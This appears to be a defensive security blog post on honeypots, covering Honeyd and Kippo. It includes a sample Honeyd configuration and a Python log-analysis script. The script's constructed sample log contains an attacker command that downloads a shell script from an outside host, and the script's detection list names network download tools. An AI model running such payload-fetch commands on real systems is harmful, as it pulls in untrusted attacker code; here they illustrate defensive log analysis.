Honeypots offer many benefits; most notably, they can significantly improve your security posture. Every organization should therefore consider implementing a honeypot, weighing the benefits against the disadvantages.
This post covers the pros and cons of honeypots to help you decide whether a honeypot is appropriate for your organization.
What is a honeypot and why are they used?
A honeypot is an additional security protection that can be used alongside a firewall and other security solutions to help protect a network from hackers.
Honeypots, as the name suggests, are designed to catch a hacker’s eye so that their efforts will be drawn to attacking the honeypot rather than a system where they could cause serious harm.
They appear to be an easy entry point into a network to distract attackers from looking at other parts of the system. They are a deliberate hole in the security of the system that can be attacked without causing harm. They allow IT teams to gather valuable intelligence on hackers who are attempting to gain access to their networks.
In contrast to a firewall, which is designed only to keep external attackers out, a honeypot can also identify internal threats and attacks. Many companies are almost blind to attacks from within. A honeypot provides increased visibility and allows IT security teams to defend against attacks that the firewall fails to prevent. There are considerable benefits of honeypots, and many organizations have implemented them as an additional protection against internal and external attacks.
There are many benefits of honeypots!
A honeypot is a system that is set up with the singular purpose of being attacked. It is a system designed to be exploited, hacked, infected with malware, and generally abused by a malicious third party. Why would you do that, you may ask? Well, there are many benefits of honeypots.
You may wonder why you should spend your time, effort, and money setting up a system that will attract hackers. Why should you deliberately create a system with weakened defenses that will be exploited? Why even attract interest from malicious third parties?
There are three very good reasons why you should. First, you will be wasting a hacker’s time, and time spent attacking a system that is safe is time not spent hacking a system that will damage your organization if the hacker succeeds.
Secondly, by setting up a honeypot you will be able to see who is attacking you and the methods that are being used. This will give you a very good idea of the types of attacks being used and the defenses you will need to install to protect your real systems and data from attack.
Thirdly, an attack on a honeypot is likely to frustrate a hacker and stop them from hacking your real computer systems.
Security researchers are well aware of the benefits of honeypots. They have been vital in the study of hackers’ behavior. They can be used to determine how systems are attacked and are also a very useful part of system defenses. It is not a question of whether you should set up a honeypot, but rather why you have not already done so.
There are many different types of honeypot that can be implemented. You can set up a dummy system with an entire network topology if you wish. You can have many different hosts, you can include a wide range of services, and even different operating systems. In short, an entire system can be set up to appear genuine and allow an attack to take place.
There are many different types of honeypot that can be deployed, although for the purpose of this article we have provided further information on two popular honeypots below: Honeyd and Kippo.
The Honeyd honeypot
This is a small daemon that can be used to create a network containing many virtual hosts. Each of those hosts can be set up and configured differently. You can run a range of arbitrary services on each, and configure them to appear as if they are running different operating systems. For network simulation purposes, you can create tens of thousands of different hosts on your LAN using Honeyd if you so wish. You can use Honeyd to hide your real system, identify threats, assess risk, and improve your security posture.
- Simulate multiple virtual hosts simultaneously
- Identify cyberattacks and passively fingerprint the attacking hosts
- Simulate numerous TCP/IP stacks
- Simulate network topologies
- Set up real FTP and HTTP servers, and even UNIX applications under virtual IP addresses
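As an added example that is not from the page or the Honeyd project, the configuration below, written in Honeyd's own configuration-file syntax, ties the points above together: a default template that silently drops traffic to unconfigured addresses, two virtual hosts with different OS personalities, one service backed by a script, and an SSH port handed off to a separate Kippo instance. The personality strings, the script path and all addresses are assumptions: personality names must match entries in the nmap.prints file shipped with Honeyd, and the script path must point at a script actually installed on the host.

```text
# Example honeyd.conf (added illustration; personalities, paths and
# addresses are placeholders and must be adapted to your installation).

# Default template: drop everything so unconfigured IPs look empty.
create default
set default default tcp action block
set default default udp action block
set default default icmp action block

# A fake Windows host that answers on a few common ports.
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 139 open
add windows tcp port 445 open
set windows uptime 1728650

# A fake Linux host whose SSH port is proxied to a Kippo instance
# running on 10.0.0.5:2222 (assumed address).
create linux
set linux personality "Linux 2.4.7 (X86)"
set linux default tcp action reset
add linux tcp port 21 open
add linux tcp port 22 proxy 10.0.0.5:2222

# Bind the templates to unused addresses on the LAN.
bind 192.168.1.200 windows
bind 192.168.1.201 linux
```

The default template matters for the isolation point made later in the article: anything Honeyd answers for that you did not explicitly configure should be blocked, not left open, so the decoy does not advertise more surface than you intend to monitor.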
The lowdown on Honeyd
We invited a guest sysadmin (Arona Ndiaye) to provide input on the Honeyd honeypot to get the perspective of a Linux administrator. She mainly uses Linux and *nix systems, and has tried out Honeyd to get an idea of how it works, what it can do, and its functionality. She installed it on Kali Linux, which was a simple process requiring a single line to be added to the sources.list file, then running apt-get update && apt-get install honeyd.
A few tweaks were needed to ensure the firewall had the correct permissions set, along with some simple text editing in a configuration file. That was all that was needed. If any problems are encountered, or more detailed information is required, it is all available on the honeyd website. Most people find the easiest way to get started is to play with the system and to try to attack it, which is what she did.
She was particularly impressed with the information that can be gathered on attacks and scans. The methods of attack were recorded in intricate detail, including how it was possible for hackers to fool NMAP. The overall verdict was “seriously impressive.”
The Kippo honeypot
We also put Kippo, another popular honeypot, to the test. Kippo is used to create a dummy SSH server that allows attackers to conduct brute force attacks against it. The honeypot can be set up with a root password that is particularly easy to guess, such as a simple string of numbers: 123456, for example.
Set up the honeypot with an entire file system, or even better, clone a real system for added realism. The aim is to convince the hacker that he or she is attacking a real system. Once the attacker has successfully managed to log in to the system, everything they subsequently do will be recorded. All actions will be logged, so it is possible to see exactly what happens when a system is attacked.
What is particularly good about Kippo is how detailed the fake system can be. You can really waste a considerable amount of a hacker’s time and get an accurate picture of exactly what they are trying to achieve, the files they upload and download, what malware and exploits they install, and where they put them. You can then use a virtual machine to analyze the attack in detail when you have the time.
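The value of Kippo is in the log it produces, so as an added example (not code from the page or the Kippo project) here is a small Python script that turns Kippo-style log lines into a per-attacker summary and a list of alerts: repeated login attempts, any successful login, and any URL fetched with a download tool once inside. The log line shape is an approximation of Kippo's text log and the sample lines, addresses and URL are constructed; adapt the two regular expressions to your real log before relying on it.

```python
"""Summarise Kippo-style SSH honeypot logs and raise alerts.

Added example. The line format is an approximation of Kippo's log and the
sample data below is constructed, not captured from a real system.
"""
import re
from collections import defaultdict

# Constructed sample log in the assumed Kippo shape.
SAMPLE_LOG = """\
2014-08-05 13:01:30+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 203.0.113.5:51234 (10.0.0.5:2222) [session: 1]
2014-08-05 13:01:31+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/admin] failed
2014-08-05 13:01:32+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/password] failed
2014-08-05 13:01:33+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/123456] succeeded
2014-08-05 13:01:40+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.5] CMD: uname -a
2014-08-05 13:01:45+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.5] CMD: wget http://198.51.100.7/x.sh
2014-08-05 13:02:00+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.9] login attempt [admin/admin] failed
"""

# Login attempt lines: "[user/password] succeeded|failed" tagged with the source IP.
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[SSHService ssh-userauth on HoneyPotTransport,"
    r"(?P<sess>\d+),(?P<ip>[\d.]+)\] login attempt "
    r"\[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)$"
)
# Shell command lines recorded inside a session.
CMD_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[SSHChannel session \(\d+\) on SSHService ssh-connection on "
    r"HoneyPotTransport,(?P<sess>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$"
)
URL_RE = re.compile(r"(?:https?|ftp)://\S+")
DOWNLOADERS = ("wget", "curl", "tftp", "ftp")


def new_record():
    return {"attempts": 0, "failed": 0, "succeeded": [], "commands": []}


def summarize(log_text):
    """Group login attempts and commands by source IP."""
    per_ip = defaultdict(new_record)
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            rec = per_ip[m["ip"]]
            rec["attempts"] += 1
            if m["result"] == "succeeded":
                rec["succeeded"].append((m["user"], m["pw"]))
            else:
                rec["failed"] += 1
            continue
        m = CMD_RE.match(line)
        if m:
            per_ip[m["ip"]]["commands"].append(m["cmd"])
    return dict(per_ip)


def alerts(summary, brute_threshold=3):
    """Return (ip, kind, detail) tuples. Any hit on a honeypot is suspect,
    so a single successful login is already worth an alert."""
    out = []
    for ip, rec in sorted(summary.items()):
        if rec["attempts"] >= brute_threshold:
            out.append((ip, "brute-force", f"{rec['attempts']} login attempts"))
        for user, pw in rec["succeeded"]:
            out.append((ip, "login", f"{user}/{pw}"))
        for cmd in rec["commands"]:
            words = cmd.split()
            if words and words[0] in DOWNLOADERS:
                # The fetched URL is an indicator you can block or hunt for elsewhere.
                for url in URL_RE.findall(cmd):
                    out.append((ip, "download", url))
    return out


if __name__ == "__main__":
    for ip, kind, detail in alerts(summarize(SAMPLE_LOG)):
        print(f"{ip:15} {kind:12} {detail}")
```

Run against a real Kippo log, the "download" alerts are the lines to act on first: the URLs name the infrastructure serving the attacker's payloads, which is exactly the intelligence the paragraph above says a honeypot exists to collect.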
Set up combo-honeypots to create a highly elaborate network
Both Kippo and Honeyd are open source, so it is possible to tweak both honeypots to suit your own needs and requirements. You can even combine the two to build up extremely elaborate networks – specifying specific file contents and creating fake systems that appear perfectly real. How much time you spend doing this, and the level of detail you want to add, is up to you. If you really want to find out exactly how the systems are attacked to better prepare your real system, these are exceptionally good tools to use.
Adding a honeypot can help to improve your security, but simply setting one up will not. Unfortunately, to gain the benefits of honeypots you will need to invest some time in setting up a realistic network and it will need to be updated and maintained. It must be treated like any other machine or system you use in order for it to be effective. You must also make sure that it is isolated or insulated. Creating a fake system that is easy to attack shouldn’t give a hacker an easy entry point into your real system!
Summary: Main Benefits of Honeypots
Listed below are the main benefits of honeypots:
- Observe hackers in action and learn about their behavior
- Gather intelligence on attack vectors, malware, and exploits. Use that intel to train your IT staff
- Create profiles of hackers who are trying to gain access to your systems
- Improve your security posture
- Waste hackers’ time and resources
- Demonstrate that you are being attacked; that data is valuable when making the case for a larger security budget
Disadvantages of honeypots
We have covered the benefits of honeypots, but are there any disadvantages of honeypots apart from the time taken to set them up?
No system is perfect, and there are notable disadvantages of honeypots. One of the main problems is that the system is designed to be attacked, so attacks will likely take place. Once the honeypot is accessed, it could be used as a launchpad for further attacks, either on an internal system or on another company. Honeypots therefore introduce risk, and with it an issue of legal liability: if your honeypot is used in an attack on another business, you could be sued. The level of risk introduced will depend on the honeypot. Typically, the more complex the honeypot, the greater the risk is likely to be.
Then there is the question of the resources you will need to set up the system. If you want to create a realistic system that will fool hackers, it needs to look and behave like the real system it is designed to mimic. Free options are available, which makes setting up a honeypot more cost-effective, although they still require resources. The hardware comes at a cost, and honeypots require maintenance and monitoring. The cost may be prohibitive for some businesses.
That said, maintenance need not be a major drain on time. In many cases, honeypots can be set up and left. Since there is no expected production activity, monitoring the honeypot and assessing activity will require minimal effort. Automatic alerts are generated when an attack is in progress, and any data generated will likely reflect a real attack. Honeypots may be set up on existing old hardware that would otherwise not be used. In such cases, costs can be kept to a minimum.
Honeypots add complexity to a network, and the more complex a network is, the harder it is to secure. The honeypot could introduce vulnerabilities that could be exploited to gain access to real systems and data.
Finally, the honeypot can only tell you about an attack in progress if the honeypot itself is attacked. If an attack involves other systems and the honeypot is untouched – for instance if the attacker identified it as a honeypot and avoided it – it would be necessary to rely on other mechanisms to identify the attack.
Whether the benefits of honeypots outweigh the disadvantages will depend on the nature of your business, how probable it is that attempts will be made to attack your network and the resources you have available for security. Your money could be better spent on other security solutions and your IT team’s time may be better directed to monitoring other systems and addressing vulnerabilities and patching software.